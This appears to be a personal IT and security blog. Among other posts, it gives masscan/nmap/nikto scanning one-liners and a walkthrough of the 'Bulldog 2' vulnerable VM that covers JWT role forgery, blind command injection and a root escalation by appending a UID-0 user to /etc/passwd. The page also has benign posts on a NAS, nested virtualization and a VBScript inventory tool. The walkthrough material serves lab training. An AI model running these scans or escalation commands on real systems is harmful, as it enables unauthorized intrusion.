I changed the CSS on this blog because frankly I am elderly and white on black, while surely super cool, was also impossible for me to read. Get off my lawn.
WARNING: The following is not subtle. If you are in an enterprise and the SOC is monitoring your network with a string telephone, they'll still probably catch this. Use it in a white-box pen test or capture the flag, not a red team engagement, or fine-tune it a lot more to your needs. And while port scanning by itself is arguably not a crime, I am not a lawyer and they are expensive. Obviously, then: always scan only networks you have permission to scan, or North Korea (kidding!).
Scanning a network segment with nmap can be interminable, even with relatively aggressive options set. Scanning a network with Masscan is super fast but returns very little information. Combining the two can be a lot of tedious work. If you can automate that with a script, that's definitely the way to go, but you may have to scan from an environment where you can't upload and/or text editing is awkward, or you may just need something quick and dirty. What do?
(Or you may just be in this to learn a little about the command line.)
Try these commands. They do rely on having nmap and masscan installed. I'm also not claiming that they're the most beautiful way of doing any of this; suggestions are welcome.
STAGE 1
cat /usr/share/nmap/nmap-services | sort -r -k3 | grep "tcp" | awk '{print $2}' | head -n1024 | cut -d "/" -f 1 >> top1024ports.txt
The command above uses nmap's services file, which has a frequency count for every port, to pull the 1024 most common TCP ports and save them in order by themselves to a file. You'll need this in a minute. If you can't or don't want to write to disk you can combine this bit with the next one, but that creates a command so long and unwieldy I decided not to do it here.
If you need UDP, change the grep portion of the command to udp and save to a different filename, for example top1024uports.txt. If you need more or fewer ports, change the head portion of the command.
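If you want to see what the Stage 1 pipeline is actually doing without an nmap install handy, here is a sketch of the same pipeline run against a miniature stand-in for the nmap-services file (the sample entries and the /tmp path are made up for illustration; on a real box you'd point it at /usr/share/nmap/nmap-services):

```shell
# Miniature stand-in for /usr/share/nmap/nmap-services:
# columns are service name, port/protocol, and open frequency.
cat > /tmp/nmap-services.sample <<'EOF'
http	80/tcp	0.484143
telnet	23/tcp	0.221265
domain	53/udp	0.213496
https	443/tcp	0.208669
ssh	22/tcp	0.182286
EOF

# Same pipeline as Stage 1: sort by frequency (descending), keep TCP only,
# grab the port/proto column, take the top 3, and strip the protocol
# to leave bare port numbers.
cat /tmp/nmap-services.sample | sort -r -k3 | grep "tcp" | awk '{print $2}' | head -n3 | cut -d "/" -f 1
# → 80, 23, 443 (one per line)
```

The real file has the same three-column layout, so the only change on a live system is the filename and the head count.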
STAGE 2
for i in $(cat top1024ports.txt); do echo "Port $i Scan"; masscan 10.0.0.0/23 --ports $i --rate=10000 | cut -d " " -f 6 | xargs -I IP -P 100 nmap -sT -sV -sC -Pn -T4 -n -p $i IP | tee $i.scan; done
or
for i in $(cat top1024uports.txt); do echo "Port $i Scan"; masscan 10.0.0.0/23 --ports U:$i --rate=10000 | cut -d " " -f 6 | xargs -I IP -P 100 nmap -sU -sV -sC -Pn -T4 -n -p $i IP | tee $i.scan; done
Change the 10.0.0.0/23 to whatever IP address and subnet you want to scan. The only difference between these two commands is that the latter is for UDP. If you want specific ports because you can't or don't want to dump to a file, do something like this for the first portion: for i in 22 23 80 445
What this does is pull the port numbers from the file or command line in order, give you a nice printed progress indicator, use masscan (which is vastly faster than nmap) to scan your subnet, use cut and xargs to slice and dice the results, and launch up to 100 simultaneous copies of nmap to aggressively version scan anything that masscan finds. The results for each port are saved to a separate text file.
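If the cut -d " " -f 6 in the middle looks mysterious: masscan reports each discovery on stdout as a single line, and the sixth space-separated field is the IP address. A quick way to see it, using a sample output line with a made-up address:

```shell
# A line of masscan stdout looks like this; field 6 is the IP.
echo "Discovered open port 80/tcp on 10.0.0.5" | cut -d " " -f 6
# → 10.0.0.5
```

Those bare IPs are exactly what xargs then feeds to nmap, one per process.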
If you aren't familiar with each command used in this piped-together string, such as xargs and cut, I'm going to strongly recommend checking them out on Google or their man pages. Once you are familiar with them (and I don't claim to be an expert myself) you will use them for stuff like this constantly. Then you will eventually learn awk and sed, and then your journey to the neckbeard side (figuratively if your gender doesn't do beards, otherwise probably literally) will be irreversible.
If you're in this business, you'll also want to be familiar with the nmap command-line arguments. In this case we are doing a TCP scan (-sT) with version info (-sV), without caring whether the host responds to ping (-Pn), and we are running scripts against what we find (-sC). Scripts are something you want to be careful with, and if you're being very conservative you may want to explicitly tell nmap to run only safe scripts that are unlikely to knock over the host (--script safe).
Be conservative in general to start here. You know your own network best, but if you're scanning a subnet through a branch office firewall or something, 100 aggressive nmap scans could be a resume-generating event. If you are scanning through the sort of clever firewall that responds with something on every port whether it's really open or not, masscan might cause it to fall over without even needing the nmap deathblow. Use the masscan --rate option to make masscan less aggressive. Use -T3 instead of -T4 to make nmap less aggressive, and cut the -P 100 in the xargs portion of the command down to a more reasonable value if you want fewer simultaneous nmap processes.
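If the -P knob is unfamiliar, it's just the xargs parallelism limit. Here's a quick demo with echo standing in for nmap (the addresses are made up); note that with parallel processes the output order isn't guaranteed:

```shell
# Run up to 2 "scans" at a time; echo stands in for the nmap command line.
printf '10.0.0.1\n10.0.0.2\n10.0.0.3\n' | xargs -I IP -P 2 echo "scanning IP"
```

Dropping -P 100 to -P 10 in the real command just means at most 10 nmap processes hammering the network at once.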
I will note that, scanning from a Kali VirtualBox VM with just 2 GB of allocated RAM to a /23 on another vlan routed by my SOHO router, these commands as written had no problem at all, and finished identifying and version scanning 1024 ports on 512 addresses (not all up) in under 3 hours, most of which was just waiting for the receive thread of the asynchronous masscan processes to time out. I haven't timed a pure nmap scan from the same box for comparison, but my guess is it would finish roughly a week from when hell freezes over.
One last warning: doing this has a tendency to jack up the terminal real bad, presumably because there are up to 100 processes writing to stdout at once (fortunately, in the case of nmap, they write in order so it's all readable). If this happens, don't panic. Just type the reset command and press Enter. You may not be able to see yourself typing, but if it works, the screen will clear and the terminal should work normally again.
BONUS ROUND
Let's say you have used the commands above to scan and then version scan a bunch of hosts with stuff running on port 80, and the command above has dumped the results to 80.scan. Do you now have to go through that text file manually if you want to, say, run Nikto, a text-based web vulnerability scanner, against each of those http hosts? Why no, you do not have to do that manually! I'm guessing that you guessed that you do not.
cat 80.scan | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq | xargs -P 10 -I {} nikto -host http://{} -o nikto{}.txt
UNIX purists would say that this is an inappropriate use of cat to read just one file. Don't @ me.
The grep syntax here is a regular expression, which is a whole other mountain to climb if you are just getting started with this stuff, but this one is pretty easy: it looks at each line of the scan file for four groups of 1-3 digits separated by dots, which is to say, an IP address. The sort and uniq commands sort the resulting list of IPs and dump duplicates. Then our old friend xargs takes *those* results and launches 10 nikto processes that scan 10 web hosts at a time, dumping the results in each case to a file called nikto{}.txt, where {} gets subbed out for the IP address. So if you scan 10 hosts you get 10 different .txt files with neat results, all done at once.
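If you want to sanity-check the extraction half of that pipeline before unleashing nikto, run it against some fake scan output. The sample lines and the /tmp path below are made up; real nmap output contains "Nmap scan report for" lines like these:

```shell
# Fake 80.scan content with one duplicate IP:
cat > /tmp/80.scan.sample <<'EOF'
Nmap scan report for 10.0.0.5
Nmap scan report for 10.0.0.12
Nmap scan report for 10.0.0.5
EOF

# Same extraction as above: pull anything shaped like an IP, sort, dedupe.
grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' /tmp/80.scan.sample | sort -n | uniq
```

You should get each IP exactly once, which is what keeps xargs from launching two nikto scans against the same host.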
The catch here is that 10 nikto processes don't handle writing to the same stdout as cleanly as nmap seems to. You will basically get gibberish on the screen. But the files themselves will be clean. Don't forget to use the reset trick to fix your terminal when you're finished.
Happy network scanning!
Bryan Buckman
Sunday, August 5, 2018
Thursday, August 2, 2018
Walkthrough: Bulldog: 2 Vulnerable VM
First post in four years. I do different stuff now.
This is a walkthrough of the Vulnhub VM Bulldog: 2 by Nick Frichette. Full disclosure: Nick and I used to work together briefly, and I shamelessly asked him for hints, which he generously gave.
Spoilers ahoy.
I'm going to do a very honest walkthrough here, so I'll point out where I got stuck, where I cheated or begged Nick for help, and where I screwed up in predictable ways. Enjoy my suffering.
If you aren't familiar with Vulnhub, it's easy to get started. Just install VirtualBox, download the VM from the link above, and double-click the OVA; it should import straight into VirtualBox. When it finishes booting, Nick has thoughtfully included a script that displays the IP it picks up from DHCP right there on the boot screen, which saves scanning for it.
If you do scan with nmap, which is usually the first thing to do to a vulnerable VM, you will discover that port 80 is the only thing open. This is evidently a webapp challenge, my bête noire. Forewarned is forearmed.
Bulldog 2's web page suggests that it's a social media site run by a social media company that's been hacked before (see Bulldog 1) and as a result has shut down registration for new users. There are a few things you can poke around on, including a login page, but no obvious way to log in. This is the point on a webapp where I typically view the source in Chrome Developer Tools, deobfuscate any JavaScript (the little curly-bracket button beneath the script source), and save it off for analysis.
I am not a JavaScript wizard, much less a fancy modern JavaScript framework wizard, but I noticed pretty quickly that the login and registration functions for this app are built into the client side, and that even though the registration page doesn't work, the endpoint for it is still there and should still take a POST request.

l.prototype.onRegisterSubmit = function() {
    var l = this
      , n = {
            name: this.name,
            email: this.email,
            username: this.username,
            password: this.password
        };
}

return l.prototype.registerUser = function(l) {
    var n = new x.Headers;
    return n.append("Content-Type", "application/json"),
        this.http.post("/users/register", l, {
            headers: n
        }).map(function(l) {
            return l.json()
        })
}

And then I got stuck and asked Nick for help, because trying to send the POST request got me an HTTP 502 error. As it turns out, I was on the right track; it's just that, you know, the POST parameters are JSON, and JSON requires quotes. Which I knew. Duh. But Nick's hints do make me think there are other ways in I missed as well. Once you do it correctly, it's pretty easy to register a new user (click to embiggen):
When you log in as your new user, you get a JWT token, and here I cheated for the second and final time: I was pretty sure the JWT token could be manipulated, but not how. It turns out that it's basically JSON encoded with Base64, so I'm sure it can be manipulated a lot of ways (those wacky web developers), but I chose an online encoder/decoder. As far as how to manipulate it, I'd already spotted an admin role in the JavaScript source below, so I just changed my auth level to 'master_admin_user' and re-encoded:

l.prototype.isAdmin = function() {
    var l = localStorage.getItem("user");
    return null !== l && "master_admin_user" == JSON.parse(l).auth_level
}

Doing that, and then changing the locally stored value to the re-encoded one with the Chrome Developer Tools, got me a nifty new Admin link on the web page. Clicking that link gets you a secondary login page:
The line about using a CLI tool to log in seemed to me to be a strong hint about command injection. Unfortunately, it's a blind command injection. After much messing with both parameters I was about to give up and try SQL injection or something when I realized the reason my ping wasn't working was a firewall. Basic infrastructure troubleshooting FTW.
Since the vulnerable machine had Internet access (on an isolated vlan), I was able to use one of my favorite reverse shell one-liners.
Success! Bulldog 2, The Reckoning:
For privilege escalation I decided to punish myself a bit, since I'd already cheated, and rather than uploading one of the Linux privilege escalation checker scripts I went for enumerating the box by hand. Fortunately, about the third thing I tried was a global find for writable files, which turned up a glaring suspect.
Ruh roh.
Here I took another detour. I immediately went for a classic:

echo "r00t:x:0:0:root:/root:/bin/bash" >> /etc/passwd
It turns out that this does not work on modern Linuxes. You will get an authentication error when you try to su as r00t with a blank password. After a bit of Googling I determined that you have to set a password with the correct encoding.
After this is done, you can do the same trick to echo a new root user into the file, this time with a working password, and then su to the user.
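Here's a sketch of that encoding step, assuming openssl is available on the box and using a made-up username and password; the final append-and-su line is shown as a comment because you'd only run it on the target:

```shell
# Generate an MD5-crypt hash for the password "pass123"; su will accept
# this in the second field of /etc/passwd in place of the usual "x".
HASH=$(openssl passwd -1 pass123)

# The entry to append on the vulnerable box (UID 0 and GID 0 = root):
ENTRY="r00t:$HASH:0:0:root:/root:/bin/bash"
echo "$ENTRY"

# On the target: echo "$ENTRY" >> /etc/passwd && su r00t   (password: pass123)
```

The hash format matters: a bare plaintext or empty second field is exactly what fails on modern systems, which is why the blank-password trick above didn't work.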

Subsequent to this you are expected to do the root dance. I won't spoil the final message for you in case you want to walk through it yourself.
This was a great VM. It's unusual for its use of modern Javascript frameworks and I learned a great deal from it that I may use on actual pentests, should anyone be foolish enough to allow me to pentest webapps. Overall I'd give it a strong thumbs up even if I didn't know Nick, and I look forward to his next one.
Sunday, April 27, 2014
Synology DS1513+ mini-review
I've been meaning to write this post, and to pick up my commitment to this blog, for four months. So yeah.
This is not a full review of the performance specs, etc. of the Synology 1513+. You can find something like that here.
This is just a brief review of setup and daily use of the DS1513+ as a media storage device. The DS1513+ is frankly grotesque overkill for this purpose, but I wanted something future-proof, and I got it. Synology's custom RAID algorithm allows adding disks of different sizes on the fly, and if that isn't enough, hardware expansion units are available to allow you to add more disks. I went with five WD Red drives, which are supposedly designed specifically for use in NAS enclosures. They're 5400 rpm, so not fast, but they were inexpensive (the price has since gone up) and they run cool. Synology's magic NAS software (about which more in a moment) says the entire enclosure is running at 88 degrees Fahrenheit, which is remarkably low, and there is a turbo fan setting I'm not currently using. I suspect if you wanted to spring for them you could run 7200 rpm drives without a temperature issue. I have not thus far noticed storage to be a bottleneck.
Setup of the unit is a weird process. Essentially a Synology utility searches for and finds the device on the LAN and then pushes the Synology DiskStation package to it. As a sysadmin who has been scarred by more than one firmware update gone bad this made me nervous, even though DiskStation is just a webserver add-on and not the underlying firmware itself. DiskStation is a browser-based graphical interface. Obligatory pretty picture:
The main issue with the install was that I'd also purchased a managed switch with the intent of enabling both link aggregation and jumbo frames in order to make the connection faster (the NAS has 4 ethernet ports). This took some digging through deep options in both the NAS and the switch to accomplish, and it would not have been doable without some network experience. On the other hand, no one without network experience would have known about or attempted it, so that's fine.
Once fully up and running the thing has been delightful. No hiccups, no dropped frames on 1080p video even when streamed over my crappy old 802.11g wireless bridge to my home office in a back room. Particularly nice has been the combination of Synology Download Station and the Download Station Chrome Plugin, which allows me to click a magnet link in Chrome on any device in the house and have the downloading handled entirely on the NAS. For my legal torrents of Linux distributions, of course.
There are all sorts of other advanced features and downloadable plugins that allow you to do things with this NAS that I've frankly never imagined doing on a NAS. Use it as an iSCSI SAN. Turn it into an LDAP server, a DNS server, a host for an enterprise resource planning system (?!), or about a million other things apparently. I haven't tried much of this, but Synology seems determined to make their products as open and flexible as possible, which is a big plus to me.
I paid quite a bit less for this NAS than it's now selling for, which is peculiar, so you may want to look for bargains, or check out the other Synology models. Git you one.
Wednesday, August 21, 2013
Nested Virtualization with VMWare Workstation and KVM
I once intended for this to be a daily blog. I see it's been two years since my last entry. Ooops.
Anyway, I overcame a technical challenge (i.e., snafu) today for which Google wasn't much help. So here we go.
Scenario: I have a PC. It has 32 GB of RAM. I use it both for games and other stuff requiring Windows, and for certification labs, which I run on VMWare Workstation because I got a free license when I passed my VCP.
I recently began studying for my RHCSA and eventually RHCE. The books for these certifications come with lab virtual machines. The lab VMs are in KVM format. KVM is a Red Hat exam certification topic, and it doesn't run on Windows.
I didn't want to convert the VMs to VMWare format because I need to learn KVM anyway. But I considered it. Everything I found on Google was about converting VMs the other direction. This doesn't bode super-well for the market value of my VMWare certification, but never mind.
The free VMWare converter does not recognize KVM format.
Giving up on the conversion idea (though I'm sure there is some way to make it work), I moved on to a nested scenario: running the lab VMs on a CentOS host which is itself a guest of VMWare Workstation under Windows. The RedHat lab guide (the McGraw Hill one, by Michael Jang) explicitly says not to do this: KVM will not install on a VM, or if it does, it will act badly. My inner first-world anarchist accepted the challenge.
In fact, it worked immediately, but it sucked (technical term). Performance was unbearable. So...
Objective: to make this nested virtualization scenario pleasant enough to use.
Resolution: It became clear pretty quickly, though I don't recall how, that this was a hardware virtualization problem. That is, the virtualization boost that modern processors provide to virtualization guests wasn't being relayed on to the guests of the guest. There is an option to do this in VMWare called "Virtualize Intel VT-x/EPT or AMD-V/RVI".
Unfortunately it was greyed out on my VMs. Fortunately adding it is just a matter of adding the following line at the end of the .vmx file for the VM:
vhv.enable = "true"
From there, shut down and restart the RedHat guest host (host guest?) VM. The RedHat host guest (guest host?) should now see its CPU as having virtualization assist. You can verify like so:
[user@CentOS64-VHost ~]$ virt-host-validate
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking for device /dev/kvm : PASS
QEMU: Checking for device /dev/vhost-net : PASS
QEMU: Checking for device /dev/net/tun : PASS
LXC: Checking for Linux >= 2.6.26 : PASS
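Another quick check from inside the guest is to look for the hardware-virtualization CPU flag directly. Here's a sketch against a sample /proc/cpuinfo flags line (the sample file and /tmp path are illustrative; the real check is the commented one-liner at the end):

```shell
# vmx = Intel VT-x, svm = AMD-V. A sample cpuinfo flags line for illustration:
cat > /tmp/cpuinfo.sample <<'EOF'
flags		: fpu vme de pse tsc msr pae mce cx8 vmx ssse3 sse4_1
EOF

# If passthrough is working, one of the two flags shows up:
grep -E -o 'vmx|svm' /tmp/cpuinfo.sample
# → vmx

# On the real guest: grep -E 'vmx|svm' /proc/cpuinfo
```

If neither flag appears on the real guest, the vhv.enable setting didn't take and KVM will fall back to painfully slow software emulation.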
The last thing that must be done is to enable the vmx processor option (for the passthrough hardware assist) in the virtual machine settings of the guests (guest guests?) in KVM. The easiest way to do this is to set advanced processor options when you create a VM in KVM. Then use the "Copy Host CPU Configuration" button.
Restart the KVM guest if you need to, and you're good. Fast nested guests.
Monday, June 6, 2011
VBScript - Get Service Tags of All Dell PCs in Active Directory
I used to have access to Kaseya which will pull this for you, but my new employer doesn't use it. This script has some issues (if a PC is offline it will just throw in the service tag of the last one) but it was quick and dirty enough for my purposes today. I observe that Blogger doesn't handle code well, so beware of formatting. I'll have to find a way around this and blog that.
' Pulls the Dell Service Tag or equivalent of every computer in AD and writes them to a text file with computer name
On Error Resume Next

Const ADS_SCOPE_SUBTREE = 2

Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile("C:\users\example\desktop\test.txt", 8, True)

' Query Active Directory for every computer object
Set objConnection = CreateObject("ADODB.Connection")
Set objCommand = CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand.ActiveConnection = objConnection
objCommand.CommandText = _
    "Select Name, Location from 'LDAP://DC=example,DC=corp' " _
    & "Where objectClass='computer'"
objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE
Set objRecordSet = objCommand.Execute

' For each computer, pull the chassis serial number (the Dell Service Tag) via WMI
objRecordSet.MoveFirst
Do Until objRecordSet.EOF
    strComputer = objRecordSet.Fields("Name").Value
    Set objWMIService = GetObject("winmgmts:" & _
        "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    For Each objSMBIOS In objWMIService.ExecQuery("Select * from Win32_SystemEnclosure")
        WriteStuff.WriteLine strComputer & " Serial Number: " & objSMBIOS.SerialNumber
    Next
    objRecordSet.MoveNext
Loop

WriteStuff.Close
Set WriteStuff = Nothing
Set myFSO = Nothing
MsgBox "Done"
Thursday, June 2, 2011
Old blog, new days
I'm intending this to be a chronicle of the daily struggles to be a good IT engineer as well as a running commentary on the technorati. The migrations of our jobs to the cloud and overseas, fighting the long defeat against bad security, the slow erosion of our privacy, and all the other fun trends that make technology exciting.
Some days you'll get commentary; some days it'll be a link blog.
I'll try to do an appropriate level of page decoration here over the next few days.